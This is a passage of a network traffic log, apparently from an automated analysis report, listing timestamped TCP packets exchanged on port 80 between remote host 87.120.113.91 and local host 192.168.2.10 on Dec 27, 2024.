                                                        Dec 27, 2024 14:53:42.444860935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.444977045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.445009947 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.445777893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.445828915 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.445864916 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.446628094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.446794987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.446835041 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.447487116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.447591066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.447632074 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.448395014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.448506117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.448544979 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.449192047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.449258089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.449316025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.519226074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.519273996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.519364119 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.519475937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.519562006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.519599915 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.520324945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.520443916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.520478964 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.521255016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.537918091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.537977934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.537985086 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.538522959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.538569927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.538579941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.539235115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.539278984 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.539374113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.540055990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.540091038 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.540162086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.540949106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.540988922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.541063070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.541831970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.541877031 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.541949987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.542695999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.542738914 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.542809010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.543617010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.543670893 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.543708086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.544615030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.544657946 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.544673920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.545399904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.545442104 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.545505047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.546324968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.546367884 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.546454906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.547394037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.547429085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.547439098 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.548223972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.548269987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.548278093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.549000978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.549036026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.549046993 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.549678087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.549719095 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.549755096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.550450087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.550484896 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.550625086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.551372051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.551415920 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.551450014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.552153111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.552208900 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.552227020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.552980900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.553066969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.553066969 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.553860903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.553885937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.553917885 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.554713964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.554737091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.554765940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.555557013 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.555605888 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.555619955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.556428909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.556476116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.556477070 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.557317019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.557363987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.557403088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.558156013 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.558202982 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.558250904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.559010983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.559058905 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.559097052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.559870005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.559910059 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.559948921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.600100040 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.631643057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.631779909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.631850004 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.632031918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.632088900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.632131100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.632901907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.633008003 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.633049011 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.633733034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.633840084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.633879900 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.634577036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.634704113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.634742022 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.635502100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.635626078 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.635668993 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.636302948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.636425018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.636466026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.636867046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.636977911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.637018919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.637742043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.637856960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.637917995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.638614893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.638668060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.638705969 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.639465094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.639717102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.639758110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.640322924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.640434980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.640475988 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.641164064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.641294003 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.641334057 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.642025948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.642163992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.642203093 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.642894983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.643013954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.643049002 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.643759012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.643889904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.643930912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.644612074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.644762039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.644799948 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.645509958 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.645641088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.645680904 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.646378040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.646522045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.646559954 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.647180080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.647305012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.647350073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.648073912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.648179054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.648221016 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.648983002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.649039984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.649075985 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.649764061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.649878025 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.649919033 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.650629044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.650734901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.650774956 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.720374107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.720431089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.720489979 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.720751047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.720843077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.720875978 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.721632957 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.721877098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.721910000 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.722444057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.739358902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.739407063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.739465952 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.739481926 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.739526033 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.739602089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.740350962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.740396023 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.740464926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.741225004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.741274118 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.741359949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.742104053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.742144108 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.742207050 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.742933989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.742980957 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.743056059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.743809938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.743860006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.743925095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.744664907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.744714975 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.744781971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.745567083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.745615005 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.745667934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.746378899 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.746471882 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.746519089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.747241974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.747284889 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.747364998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.748090029 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.748121977 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.748193026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.748959064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.749001026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.749078989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.749854088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.749905109 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.749949932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.750700951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.750741959 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.750880003 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.751568079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.751602888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.751609087 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.752418995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.752463102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.752491951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.753319979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.753355026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.753361940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.754165888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.754216909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.754219055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.755002975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.755050898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.755081892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.755831003 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.755882025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.755927086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.756736040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.756769896 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.756882906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.757584095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.757628918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.757661104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.758454084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.758497953 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.758516073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.759303093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.759358883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.759378910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.760147095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.760190010 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.760205030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.761017084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.761058092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.761145115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.803219080 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.832911015 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.833020926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.833070040 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.833229065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.833472967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.833517075 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.833520889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.834103107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.834147930 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.834182024 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.834896088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.834932089 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.834985971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.835701942 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.835741043 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.835768938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.836543083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.836585999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.836661100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.837398052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.837439060 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.837490082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.838138103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.838179111 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.838232040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.839010000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.839045048 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.839185953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.839840889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.839884043 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.839893103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.840714931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.840750933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.840884924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.841562986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.841602087 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.841650009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.842430115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.842470884 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.842503071 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.843265057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.843348026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.843383074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.844144106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.844189882 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.844229937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.845036030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.845074892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.845136881 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.845861912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.845904112 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.845943928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.846721888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.846759081 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.846776009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.847587109 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.847623110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.847702980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.848462105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.848506927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.848546982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.849379063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.849417925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.849484921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.850210905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.850246906 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.850292921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.851022959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.851059914 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.851150990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.851898909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.851933956 CET4972180192.168.2.1087.120.113.91
